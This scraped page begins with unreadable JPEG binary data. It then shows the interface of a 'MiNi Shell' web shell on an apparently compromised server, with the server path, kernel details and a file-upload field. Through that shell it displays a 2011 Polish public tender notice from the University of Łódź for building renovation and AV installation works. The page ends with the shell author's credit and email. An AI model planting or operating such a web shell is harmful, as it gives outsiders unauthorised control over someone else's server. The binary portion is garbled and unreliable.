JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110517/117744-N-2011.html

<p class="kh_header"><b>Łódź: Modernizacja, przeprowadzenie prac budowlano - instalacyjnych oraz doposażenie w budynku Wydziału Zarządzania Uniwersytetu Łódzkiego przy ul. Matejki 22/26</b><br>
<b>Numer ogłoszenia: 117744 - 2011; data zamieszczenia: 17.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Łódzki , ul. Narutowicza 65, 90-131 Łódź, woj. łódzkie, tel. 0-42 635 43 54, faks 0-42 635 43 25.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uni.lodz.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.uni.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja, przeprowadzenie prac budowlano - instalacyjnych oraz doposażenie w budynku Wydziału Zarządzania Uniwersytetu Łódzkiego przy ul. Matejki 22/26.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wydziału Zarządzania Uniwersytetu Łódzkiego przy ul. Matejki 22 26 w Łodzi
Prace branży budowlanej
1.Malowanie ścian w aulach A0, A1, A3
2.Malowanie ścian w 18 salach dydaktycznych: 106, 109, 115, 205, 206, 207, 208, 209, 211, 215, 305, 306, 307, 308, 309, 311, 315, 316.
3.Malowanie sufitów w 5 salach: 205, 208, 305, 308, 315.
4.Demontaż wykładziny dywanowej w pracowniach komputerowych nr 1 i 2 i położenie wykładziny antyelektrostatycznej.
Parametry wykładziny:
- wykładzina igłowana w rulonie wykonana z włókien poliamidowych (wykładzina typu filc)
- grubość całkowita 6,5 mm
- ciężar całkowity 1450 g m2
- klasyfikacja użytkowa 33
- antyelektrostatyczność 2,0kV
- rezystancja pionowa 1 x 108 Ohm
- odporność ogniowa klasa Bfl - S1
- tłumienie dźwięków około 22 dB
5.	Demontaż wykładziny podłogowej w pokojach nr 14, 15, 16, 17, 18 Dziekanatu i ułożenie płytek gresowych na części podłogi od drzwi do lady.
6.	Demontaż wykładziny podłogowej w korytarzu prowadzącym do bufetu na poz. -1 i ułożenie płytek gresowych.
7.	Wymiana pękniętych płytek granitowych na posadzce w holu głównym na poz. 1.
8.	Likwidacja pęknięć na ścianach w pokojach nr 18, 120, 202, 257 i ponowne przemalowanie poszczególnych ścian.
9.	Wymiana pękniętych płyt kartonowo - gipsowych, okładzinowych na ścianach w korytarzu koło biblioteki na poz. -1  z wykonaniem gładzi gipsowych i odtworzeniem tynku mozaikowego.
10.	Doklejenie odpadniętych cokołów z płytek gresowych.
11.	Montaż kątownika ze stali nierdzewnej na uskoku na granicy gresu i kostki betonowej przy wejściu głównym.
12.	Usunięcie przecieku ze szklanego dachu nad patio wewnętrznym.   
13.	Remont cząstkowy nawierzchni z kostki betonowej - likwidacja zapadnięć kostki na terenie wokół budynku Wydziału Zarządzania; na schodach od strony Fizyki, na skarpie koło mostka. Poprawienie złego spadku kostki betonowej na schodach do portierni zewnętrznej, wyrównanie krawężników i wyrównanie kostki brukowej koło portierni zewnętrznej.
14.	Wymiana pękniętej szyby w drzwiach klatki schodowej.
15.	Wymiana wycieraczek ze szczotkami w profilach aluminiowych w wejściach do budynku.
16.	Wykonanie i dostawa wyposażenia meblowego: szafka na sprzęt AV - 1 szt oraz biurko - 1 szt wg.  zał 2b Arkusz kalkulacyjny

- Biurko 160x 70x 75 z półką na klawiaturę oraz zasłoną zasłaniającego nogi od frontu o wys. 40cm. - rys. zał. nr 1
- Szafka na sprzęt AV  z dwiema półkami o wymiarach 60 x 65x 70 - rys. zał. nr 1 
Materiał na biurka i szafki:
- płyta wiórowa  melaminowana dwustronnie
- kolor płyty buk
- grubość blatów i konstrukcji biurek, grubość wieńców górnych i dolnych szafek - 25 mm
- grubość korpusów i półek oraz półek na klawiaturę w biurkach - 18 mm
- prowadnice półek na klawiaturę stalowe, rolkowe z blokadą w pozycji zamkniętej malowane proszkowo
- wszystkie obrzeża ABS o gr. 2 mm w kolorze użytej płyty meblowej
- zamki: zamek meblowe baskwilowe , np. haffele lub równoważne co najmniej w  3 punktach -zawiasy: stalowe, puszkowe samozamykające się
-plecy szafek : z płyty melaminowanej dwu stronnej o grubości min 8 mm, wpuszczona w ręgi wieńców i boków szaf wg. Rysunku nr 58 
- stopki meblowe: biurko - ślizgacze PCV, szafki - kula z regulacją w wieńcu dolnym
-uchwyty: metalowe, kolor satyna, malowane proszkowo
- regulacja półek - 3 położenia co 32 mm każda
- przepusty na kable w blacie biurka - 1 szt., w ściankach szafki - 2szt.

17.	Wymiana liter na tablicy informacyjnej zewnętrznej.
18.	Wymiana wyposażenia w w.c. dla niepełnosprawnych na poz. -1; umywalki, muszli klozetowej i lustra.
19.	 Zamontowanie przedmiotu zamówienia  tablic informacyjnych  przy drzwiach do sal dydaktycznych. 


Urządzenia AV dla Wydziału Zarządzania załącznik nr 2c
Opis do instalacji dla urządzeń audiowizualnych

Sale 205 i 305

1.	Zainstalowanie tablic sucho ścieralnych na ścianach po lewej stronie od drzwi wejściowych.
2.	Zainstalowanie gniazd zasilających i komputerowych na ścianach pod tablicami w ich nowym miejscu.

Sala 109 

1.	Zainstalować istniejący projektor multimedialny przy użyciu  przedmiotu zamówienia uchwytu sufitowego oraz zainstalować przedmiot zamówienia ekran o napędzie elektrycznym. 
2.	Zasilanie do szafki sprzętowej przy stanowisku wykładowcy prowadzić z najbliższej rozdzielnicy jako wydzielony obwód, zabezpieczony wyłącznikiem P312 B16 30mA. W szafce obwód zakończyć gniazdem przenośnym wielokrotnym 6x2P+Z.
3.	Do szafki sprzętowej doprowadzić z najbliższego punktu dystrybucyjnego dwie skrętki komputerowe UTP 4x2x0,5 kat 5e. W szafce zakończyć gniazdami RJ 45 kat 5e, a w punkcie dystrybucyjnym rozszyć na patchpanelu.
4.	Zasilanie ekranu wyprowadzić z istniejącego obwodu gniazd ogólnych. Sterowanie ekranem z przełącznika na ścianie w pobliżu okna.
5.	Z szafki sprzętowej wyprowadzić wiązkę przewodów do projektora, długość wiązki do 15 m. Wiązka będzie zawierała:
a.	przewód zasilający OMY 3x1,5 mm2 zakończony gniazdem 2P+Z przy projektorze i wtyczką sieciową w szafce,
b.	przewód RGBHV o parametrach transmisyjnych nie gorszych niż Percon VK520 zakończony gniazdem DB15HD w szafce i wtykiem DB15HD przy projektorze,
c.	przewód CV zakończony gniazdem RCA w szafce i wtykiem RCA przy projektorze,  o parametrach nie gorszych niż Kramer BC1X59,
d.	przewód HDMI zakończony wtykami o parametrach nie gorszych niż Kramer C-HDMI/HDMI 50 HDCP compiliant lub równoważne,
e.	Wykonać instalację nagłośniającą zawierającą wzmacniacz liniowy, 4 głośniki sufitowe, mikrofon dynamiczny przewodowy.
f.	Zainstalować w szafce na sprzęt AV, przedmiot zamówienia  wzmacniacz-rozdzielacz sygnału video 2 szt. :  nie gorsze niż Kramer VP 211 K i VP 200 XL lub równoważny 2 
6.	Do projektora doprowadzić jedną skrętkę UTP 4x2x0,5 kat 5e z najbliższego punktu dystrybucyjnego. Przy projektorze skrętkę zakończyć wtykiem RJ45, a w punkcie dystrybucyjnym rozszyć na patchpanelu.
7.	Uchwyt sufitowy projektora.
Zaczep uchwytu dostosowany do oferowanego projektora, (przegub umożliwiający precyzyjną regulację położenia projektora w poziomie i w pionie). Regulowana długość w zakresie  50 - 100 cm, gwarantowana przez producenta obciążalność nie mniej niż 20kg. Możliwość zamontowania osłony na przewody. 

Sale 01, 02, 05, 06, 07, 08, 1, 2.
1.	Przedmiot zamówienia zainstalować tj.  8 szt uchwytów sufitowych do projektorów multimedialnych, które posiada Inwestor dla tych sal. Zaczep uchwytu dostosowany do istniejących projektorów, (Uzgodnić z Inwestorem). Przegub umożliwiający precyzyjną regulację położenia projektora w poziomie i w pionie. Regulowana długość w zakresie  50 - 100 cm, gwarantowana przez producenta obciążalność nie mniej niż 20kg. Możliwość zamontowania osłony na przewody. 
2.	Przedmiotem zamówienia są  2 szt. projektorów nie gorsze jak :  Mitsubischi XD 280 V lub równoważne
3.	Przedmiot zamówienia należy zamontować  na przygotowanych uchwytach tj. 8 projektorów multimedialnych
4.	W Sali Nr 1 wykonać instalację nagłośniającą składającą się ze: wzmacniacza mocy, 
6 szt. głośników sufitowych, mikrofony bezprzewodowego z odbiornikiem.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwości udzielenia zamówień uzupełniających na postawie art. 67 ust. 1 pkt. 6 ustawy do 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.44.00-4, 39.10.00.00-3, 38.65.20.00-1, 30.23.13.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca przystępujący do niniejszego postępowania musi wnieść wadium przetargowe w wysokości 4.000 zł (słownie zł cztery tysiące złotych)
Wpłacona przez Wykonawcę kwota wadium powinna również uwzględniać ewentualne koszty związane z prowizją bankową za przelew kwoty wadium na konto wskazane przez Zamawiającego.
Wadium należy wnieść najpóźniej do dnia ostatecznego terminu składania ofert. 
Wadium może być wnoszone w jednej lub kilku następujących formach: 
- pieniądzu;
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).

Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania  ofertą zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust.5 ustawy.
Wadium wnoszone w formach innych niż w pieniądzu, winno być złożone w formie oryginału w siedzibie zamawiającego (oddzielnie od oferty) - Biuro Inwestycji i Nieruchomości UŁ, ul. Lindleya 3, 90-131 Łódź, pok.226 w godz. 7.30 - 15.30.

Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego.
Nr konta Uniwersytetu Łódzkiego: 
Bank Polska Kasa Opieki S.A. II Oddział w Łodzi, ul. Piotrkowska 270, 
nr 86 1240 3028 1111 0000 2822 2488.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiada w wykazie robót budowlanych, w zakresie niezbędnym do wykazania wiedzy i doświadczenia, wykonane w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 2 roboty budowlane o wartości minimum100 tys. zł netto każda wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Pod pojęciem załączenie dokumentów potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone należy rozumieć każdy dokument, z którego będzie wynikał ten fakt, tj. np. kopie protokołów odbioru i ewentualne decyzje o przekazaniu budynków w użytkowanie jak i listy referencyjne czy opinie inwestorów potwierdzające, że prace wykonane zostały z należytą starannością.
UWAGA: w przypadku wykonawców, którzy realizowali roboty budowlane w innych walutach niż PLN, Zamawiający przeliczy wartość netto tych robót po średnim kursie NBP z dnia ukazania się ogłoszenia o zamówieniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże w opłaconej polisie, a w przypadku jej braku w innym dokumencie potwierdzającym, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę 200 tys. zł.
UWAGA: w przypadku wykonawców, którzy przedstawią opłaconą polisę lub inny dokument potwierdzający ubezpieczenie od odpowiedzialności cywilnej  w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w innej walucie niż PLN, Zamawiający przeliczy ich wartość po średnim kursie NBP z dnia ukazania się ogłoszenia o zamówieniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">7.1 W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenia zamówienia Zamawiający żąda dostarczenia następujących dokumentów:
a)	Oświadczenia o braku podstaw do wykluczenia zgodnie z art. 24 ust. 1 i 2 - Załącznik nr 2a;
b)	Aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt. 2 ustawy.
7.2 W celu wykazania spełnienia przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy Zamawiający żąda następujących dokumentów:

a)	Oświadczenia z art. 22 ust. 1 - Załącznik nr 2
b)	Wykazu robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, obejmujący co najmniej 2 roboty budowlane o wartości minimum 100 tys. zł netto każda wraz z dokumentami, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. - Załącznik nr 5 do SIWZ.
Z podaniem ich rodzaju i wartości, daty miejsca wykonania.

c)	Opłaconą polisę, a w przypadku jej braku w inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszej niż 200 tys. zł. 
Jeżeli wykonawca wskazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów określonych w pkt. 7.1

7.3 Informacja dla Wykonawców, którzy mają siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej.
7.3.1	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w pkt.7.1b 
7.3.1.1- składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a)	 nie otwarto jego likwidacji ani nie ogłoszono upadłości;
Dokumenty, o których mowa w pkt. 7.3.1.1 lit. a powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
7.3.2	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa wyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio do miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty, o których mowa w pkt. 7.3.2 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	zmiany wymiarów, położenia lub wysokości części robót budowlanych, 
2)	wprowadzenie lub zmiana podwykonawcy robót,
3)	Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, w tym zmiany ustawowej stawki podatku VAT. W przypadku zmiany ustawowej stawki podatku VAT kwota brutto wynagrodzenia Wykonawcy nie ulegnie zmianie. W zależności od wysokości nowych (zmienionych) stawek podatku VAT, podwyższeniu bądź obniżeniu ulegnie kwota netto wynagrodzenia Wykonawcy.
4)	Wycofania z sieci dystrybucji modelu sprzętu, który Sprzedawca zaoferował w ofercie i niemożliwości dostarczenia go Kupującemu, Sprzedawca zobowiązany jest zapewnić model będący technologicznym następcą sprzętu pierwotnie zaoferowanego. W sytuacji gdy model będący następcą ma gorsze parametry lub nie posiada wszystkich cech użytkowych modelu pierwotnego, Sprzedawca zobowiązany jest dostarczyć model inny o identycznych lub lepszych parametrach. Przed wykonaniem dostawy Sprzedawca zobowiązany jest złożyć u Kupującego oświadczenie potwierdzające niemożliwość dostarczenia oferowanego modelu oraz wskazuje model i typ urządzenia proponowanego wraz  z zapewnieniem o spełnianiu minimalnych parametrów wymaganych. Brak sprzeciwu ze strony Kupującego w okresie 2 dni od otrzymania oświadczenia uznaje się jako zgodę na zmianę sprzętu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uni.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Łódzki, Biuro Inwestycji i Nieruchomości, 90-131 Łódź, ul. Lindleya 3, II p, pokój 226.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2011 godzina 09:30, miejsce: Uniwersytet Łódzki, Biuro Inwestycji i Nieruchomości, 90-131 Łódź, ul. Lindleya 3, II p, pokój 226, do dnia 31.05. 2011 r. do godz. 9:30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com